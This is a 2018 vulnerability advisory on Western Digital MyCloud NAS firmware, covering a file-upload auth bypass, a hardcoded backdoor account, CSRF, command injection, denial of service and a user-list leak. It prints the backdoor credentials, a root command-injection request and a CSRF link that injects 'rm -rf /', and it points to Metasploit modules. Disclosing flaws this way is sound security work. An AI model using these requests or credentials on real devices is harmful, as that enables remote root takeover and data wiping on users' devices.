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packetstormJames BercegayPACKETSTORM:145688
HistoryJan 05, 2018 - 12:00 a.m.

WDMyCloud 2.30.165 CSRF / File Upload / Code Execution / Backdoor / DoS

James Bercegay
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GulfTech Research and Development   
# WDMyCloud <= 2.30.165 Multiple Vulnerabilities #  
Released Date: 2018-01-04  
Last Modified: 2017-06-11  
Company Info: Western Digital  
Version Info:   
MyCloud <= 2.30.165  
MyCloudMirror <= 2.30.165  
My Cloud Gen 2  
My Cloud PR2100  
My Cloud PR4100  
My Cloud EX2 Ultra  
My Cloud EX2  
My Cloud EX4  
My Cloud EX2100  
My Cloud EX4100  
My Cloud DL2100  
My Cloud DL4100  
Not Vulnerable  
MyCloud 04.X Series  
--[ Table of contents  
00 - Introduction  
00.1 Background  
01 - Unrestricted file upload  
01.1 - Vulnerable code analysis  
01.2 - Remote exploitation  
02 - Hard coded backdoor  
02.1 - Vulnerable code analysis  
02.2 - Remote exploitation  
03 - Miscellaneous security issues  
03.1 - Cross site request forgery  
03.2 - Command injection  
03.3 - Denial of service  
03.4 - Information disclosure  
04 - Reused Code  
05 - Credit  
06 - Proof of concept  
07 - Disclosure timeline  
08 - Solution  
09 - Contact information  
10 - References  
--[ 00 - Introduction  
The purpose of this article is to detail the research that I have completed   
regarding the Western Digital MyCloud family of devices.  
Several serious security issues were uncovered during my research.   
Vulnerabilities such as pre auth remote root code execution, as well as a   
hardcoded backdoor admin account which can NOT be changed. The backdoor   
also allows for pre auth remote root code execution on the affected device.  
The research was conducted on both a WDMyCloud 4TB and a WDMyCloudMirror  
16TB with the latest available firmware 2.30.165. My research shows that  
the 04 branch of the WDMyCloud firmware is not vulnerable to these issues.  
--[ 00.1 - Background  
WD My Cloud is a personal cloud storage unit to organize your photos and   
videos. It is currently the best selling NAS (network attached storage)  
device listed on the website, and is used by individuals and  
businesses alike. It's purpose is to host your files, and it also has the  
ability to sync them with various cloud and web based services.  
--[ 01 - Unrestricted file upload  
The WDMyCloud device is vulnerable to an unrestricted file upload   
vulnerability within the following file:  
The root of the problem here is due to the misuse and misunderstanding of  
the PHP gethostbyaddr() function used within PHP, by the developer of this   
particular piece of code. From the PHP manual this functions return values   
are defined as the following for gethostbyaddr():  
"Returns the host name on success, the unmodified ip_address on failure, or   
FALSE on malformed input."  
With a brief overview of the problem, let's have a look at the offending   
code in order to get a better understanding of what is going on with this   
particular vulnerability.  
--[ 01.1 - Vulnerable code analysis  
Below is the code from the vulnerable "multi_uploadify.php" script. You can  
see that I have annoted the code to explain what is happening.  
#BUG 01: Here the attacker controlled "Host" header is used to define the   
remote auth server. This is by itself really bad, as an attacker could  
easily just specify that the host be the IP address of a server that they  
are in control of. But, if we send it an invalid "Host" header it will just  
simply return FALSE as defined in the PHP manual.  
$ip = gethostbyaddr($_SERVER['HTTP_HOST']);  
$name = $_REQUEST['name'];  
$pwd = $_REQUEST['pwd'];  
$redirect_uri = $_REQUEST['redirect_uri'];   
//echo $name ."<br>".$pwd."<br>".$ip;  
#BUG 02: At this point, this request should always fail. The $result  
variable should now be set to FALSE.  
$result = @stripslashes( @join( @file( "http://".$ip."/mydlink/mydlink.cgi?  
cmd=1&name=".$name."=&pwd=".$pwd ),"" ));  
#BUG 03: Here an empty haystack is searched, and thus strstr() returns a  
value of FALSE.  
$result_1 = strstr($result,"<auth_status>0</auth_status>");  
$result_1 = substr ($result_1, 0,28);   
#BUG 04: The strncmp() call here is a strange one. It looks for a specific  
login failure. So, it never accounts for when things go wrong or slightly  
unexpected. As a result this "if" statement will always be skipped.  
if (strncmp ($result_1,"<auth_status>0</auth_status>",28) == 0 )  
//if (strstr($result,"<auth_status>0</auth_status>")== 0 )  
header("HTTP/1.1 302 Found");  
header("Location: ".$redirect_uri."?status=0");  
#BUG 05: At this point all checks have been passed, and an attacker can use  
this issue to upload any file to the server that they want.  
The rest of the source code was omitted for the sake of breivity, but it   
just handles the file upload logic once the user passes the authentication  
--[ 01.2 - Remote exploitation  
Exploiting this issue to gain a remote shell as root is a rather trivial  
process. All an attacker has to do is send a post request that contains a   
file to upload using the parameter "Filedata[0]", a location for the file   
to be upload to which is specified within the "folder" parameter, and of   
course a bogus "Host" header.  
I have written a Metasploit module to exploit this issue. The module will  
use this vulnerability to upload a PHP webshell to the "/var/www/"  
directory. Once uploaded, the webshell can be executed by requesting a URI  
pointing to the backdoor, and thus triggering the payload.  
--[ 02 - Hard coded backdoor  
After finding the previously mentioned file upload vulnerability I decided  
to switch gears and start reversing the CGI binaries that were accessable  
via the web interface. The CGI binaries are standard Linux ELF executables  
and pretty easy to go through. Within an hour of starting I stumbled   
across the following file located at:  
The above file can be accessed by visiting "/cgi-bin/nas_sharing.cgi" but   
it produces server errors with every single method, except when the "cmd"  
parameter was set to "7". This piqued my interest and so I really started  
digging into the binary, as it seemed very buggy and possibly vulnerable.  
As it turns out the error was caused due to buggy code and nothing I was or   
wasn't doing wrong. But, while I was figuring out the cause of the error I   
happened to come across the following function that is used to authenticate   
the remote user.   
--[ 02.1 - Vulnerable code analysis  
Below is the psuedocode created from the disassembly of the binary. I have  
renamed the function to "re_BACKDOOR" to visually identify it more easily.  
struct passwd *__fastcall re_BACKDOOR(const char *a1, const char *a2)  
const char *v2; // r5@1  
const char *v3; // r4@1  
struct passwd *result; // r0@4  
FILE *v5; // r6@5  
struct passwd *v6; // r5@7  
const char *v7; // r0@9  
size_t v8; // r0@10  
int v9; // [sp+0h] [bp-1090h]@1  
char s; // [sp+1000h] [bp-90h]@1  
char dest; // [sp+1040h] [bp-50h]@1  
v2 = a2;  
v3 = a1;  
memset(&s, 0, 0x40u);  
memset(&dest, 0, 0x40u);  
memset(&v9, 0, 0x1000u);  
if ( *v2 )  
v8 = strlen(v2);  
_b64_pton(v2, (u_char *)&v9, v8);  
if ( dword_2C2E4 )  
sub_1194C((const char *)&unk_1B1A4, v2);  
sub_1194C("pwd decode[%s]\n", &v9);  
if (!strcmp(v3, "mydlinkBRionyg")   
&& !strcmp((const char *)&v9, "abc12345cba") )  
result = (struct passwd *)1;  
v5 = (FILE *)fopen64("/etc/shadow", "r");  
while ( 1 )  
result = fgetpwent(v5);  
v6 = result;  
if ( !result )  
if ( !strcmp(result->pw_name, v3) )  
strcpy(&s, v6->pw_passwd);  
strcpy(&dest, (const char *)&v9);  
v7 = (const char *)sub_1603C(&dest, &s);  
return (struct passwd *)(strcmp(v7, &s) == 0);  
return result;  
As you can see in the above code, the login functionality specifically  
looks for an admin user named "mydlinkBRionyg" and will accept the password  
of "abc12345cba" if found. This is a classic backdoor. Simply login with   
the credentials that I just mentioned from the above code.  
Also, it is peculiar that the username is "mydlinkBRionyg", and that the   
vulnerability in Section 1 of this paper refers to a non existent file name  
of "mydlink.cgi" but, more about that later in section 4...  
--[ 02.2 - Remote exploitation  
At first, to the untrained eye, exploiting this backdoor to do useful  
things may seem problematic due to the fact that only method "7" gives us  
no error. And, method 7 only allows us the ability to download any files in   
"/mnt/", but no root shell. But, we want a root shell. Right?  
After digging deeper I realized that the CGI script was dying every time,   
but only at the final rendering phase due to what seems like an error where   
the programmer forgot to specify the content type header on output, thus   
confusing the webserver and causing the crash. So, everything we do gets   
executed up until that point successfully. It is just blind execution.  
Now that I had that figured out I started looking for a method I could then  
exploit to gain shell access. I started with method "51" because it was the   
first one I looked at. This particular method happened to contain a command   
injection issue. Now I easily could turn this backdoor into a root   
shell, and gain control of the affected device.  
GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlinkBRionyg&passwd=YWJjMT  
IzNDVjYmE&start=1&count=1;touch+/tmp/gulftech; HTTP/1.1  
By sending a request like the one above a remote attacker could now execute  
any commands as root. And yes, the password is base64 encoded, as that is  
what the script expects. In the example above I simply create a file called   
"gulftech" located in the "/tmp/" directory.  
The triviality of exploiting this issues makes it very dangerous, and even  
wormable. Not only that, but users locked to a LAN are not safe either. An  
attacker could literally take over your WDMyCloud by just having you visit  
a website where an embedded iframe or img tag make a request to the   
vulnerable device using one of the many predictable default hostnames for  
the WDMyCloud such as "wdmycloud" and "wdmycloudmirror" etc.  
<img src="http://wdmycloud/cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlin  
For example simply visiting the above link will totally destroy a WDMyCloud  
without the need for any type of authentication whatsoever, and there is   
nothing you can do about it except delete the file as the credentials are   
hardcoded into the binary itself.  
--[ 03 - Miscellaneous vulnerabilities  
In addition to the two previously mentioned critical vulnerabilities were  
also several other issues. These other issues are still very dangerous, but  
require authentication in some cases, and for the most part are not   
considered as critical, and also require less technical explanation.   
--[ 03.1 - Cross site request forgery  
There is no real XSRF protection within the WDMyCloud web interface. This  
can have quite the impact on unsuspecting users. Exploitation of this issue   
is trivial.  
http://wdmycloud/web/dsdk/DsdkProxy.php?;rm -rf /;  
For example, if a logged in WDMyCloud admin visits, or is forced to visit  
the above link, then the entire device will be wiped out. This is just one  
of many XSRF issues. We do not have time to track them all down.  
--[ 03.2 - Command injection  
Some time ago, a researcher from the "Exploiteers" team found an alarming  
number of command injection issues within the WDMyCloud. Unfortunately, we   
were able to find quite a few as well.  
class RemoteBackupsAPI{  
public function getRecoverItems()  
$xmlPath = "/var/www/xml/rsync_recover_items.xml";  
$jobName = $_REQUEST['jobName'];  
$cmd = "rsyncmd -l \"$xmlPath\" -r \"$jobName\" >/dev/null";  
if (file_exists($xmlPath))  
print file_get_contents($xmlPath);  
print "<config></config>";  
The above code is an example of the type of command injection issues that  
still plague the WDMyCloud. This particular command injection is post auth,  
as were all of the other command injections I found too. However, I did not   
have time to sift through looking for all of these. And by now I feel   
that the manufacturer should know better considering they just went through   
the process of patching many command injection vulnerabilities disclosed by   
the Exploiteers.[1]  
--[ 03.3 - Denial of service  
It is possible for an attacker to abuse language preferences functionality  
in order to cause a DoS to the web interface. This is due to the fact that  
any unauthenticated user can set the global language preferences for the  
entire device and all of its users. The psuedocode from the disassembled   
binary can be seen below.  
int cgi_language()  
int v1; // [sp+0h] [bp-10h]@1  
cgiFormString("f_language", &v1, 8);  
xml_set_str((int)"/language", (int)&v1);  
return system(" > /dev/null 2>&1 &");  
This is not a very useful attack vector since we only have 8 bytes to work   
with. But, you can make a script that keeps randomly resetting the language   
to some random language and it will affect all users of the device and   
requires no authentication. It is very hard to use the device if it is   
rendering all of the pages in a language you can not understand.  
The above example request sets the language to korean. There are 17   
available language codes. Details can be found in located on   
the target device.  
--[ 03.4 - Information disclosure  
It is possible for an attacker to dump a list of all users, including  
detailed user information.  
GET /api/2.1/rest/users? HTTP/1.1  
Making a simple request to the webserver like the one above will dump the  
user information to an attacker for all users. This does not require any   
authentication in order to take advantage of.  
--[ 04 - D-Link DNS-320L ShareCenter  
As I have mentioned earlier in this article, I found it peculiar that   
the username used for the backdoor is "mydlinkBRionyg", and that the   
vulnerability in Section 1 of this paper refers to a non existent file name  
of "mydlink.cgi". This really piqued my curiosity, and so I started using  
google to try to track down some leads. After searching for the term of  
"mydlink.cgi" I came across a reference to a post made by a D-Link user  
regarding their D-Link DNS-320L ShareCenter NAS device.[2]  
Within that post were references to file names and directory structure that  
were fairly unique, and from the D-link device. But, they also perfectly   
matched my WDMyCloud device. The more I looked into this the weirder it   
seemed. So, I gained access to a D-Link DNS-320L ShareCenter. Once I had it   
things became pretty clear to me as the D-Link DNS-320L had the same exact   
hard coded backdoor and same exact file upload vulnerability that was   
present within the WDMyCloud. So, it seems that the WDMyCloud software   
shares a large amount of the D-Link DNS-320L code, backdoor and all. There   
are also other undeniable examples such as misspelled function names and   
other anomalies that match up within both the WDMyCloud and the D-Link   
DNS-320L ShareCenter code.  
It should be noted that unlike the WDMyCloud the D-Link DNS-320L is   
currently NOT vulnerable to the backdoor and file upload issues, so you   
should upgrade your DNS-320L firmware as soon as possible as the issues can  
be leveraged to gain a remote root shell on the DNS-320L if you are not up  
to date with your device firmware. The backdoor was first removed in the   
1.0.6 firmware release. (July 28, 2014)  
It is interesting to think about how before D-Link updated their software   
two of the most popular NAS device families in the world, sold by two of   
the most popular tech companies in the world were both vulnerable at the   
same time, to the same backdoor for a while. The time frame in which both   
devices were vulnerable at the same time in the wild was roughly from early   
2014 to later in 2014 based on comparing firmware release note dates.  
--[ 05 - Credit  
James Bercegay  
GulfTech Research and Development  
--[ 06 - Proof of concept  
We strive to do our part to contribute to the security community.  
Metasploit modules for issues outlined in this paper can be found online.  
--[ 07 - Disclosure timeline  
Contacted vendor via web contact form. Assigned case #061117-12088041.  
Support member Gavin referred us to WDC PSIRT. We immediately sent a PGP  
encrypted copy of our report to WDC PSIRT.  
Recieved confirmation of report from Samuel Brown.  
A period of 90 days is requested by vendor until full disclosure.  
Zenofex posts disclosure of the upload bug independantly of my research [3]  
Public Disclosure  
--[ 08 - Solution  
--[ 09 - Contact information  
[email protected]  
--[ 10 - References  
Copyright 2018 GulfTech Research and Development. All rights reserved.  